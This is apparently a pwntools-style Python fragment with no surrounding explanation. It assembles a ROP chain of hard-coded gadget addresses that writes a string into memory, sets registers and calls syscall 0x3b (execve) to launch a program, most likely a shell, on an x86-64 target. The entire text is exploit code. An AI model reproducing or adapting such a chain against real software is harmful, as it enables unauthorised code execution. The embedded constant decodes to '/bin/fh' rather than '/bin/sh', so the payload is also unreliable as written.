payload = p64(0x40c27d)
#0x000000000040c27d: pop rsi; ret; 
payload += p64(0x45b070)+p64(0x41d187)
# 0x000000000041d187: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x43e353)
# 0x43e353: mov qword ptr [rsi], rax ; ret
payload += p64(0x41d187)
# 0x000000000041d187: pop rax; ret; 
payload += p64(0x100000000)+p64(0x40a007)
# 0x000000000040a007: mov edx, eax; shr rdx, 0x3f; add rax, rdx; sar rax, 1; jne 0xa017; pop rbp; ret; 
payload += p64(0x0)+p64(0x412009)
# 0x0000000000412009: pop rdi; ret; 
payload += p64(0x45b070)+p64(0x40c27d)
# 0x000000000040c27d: pop rsi; ret; 
payload += p64(0x0)+p64(0x41d187)
# 0x000000000041d187: pop rax; ret; 
payload += p64(0x3b)+p64(0x40a77a)
# 0x000000000040a77a: syscall; 
payload += b''
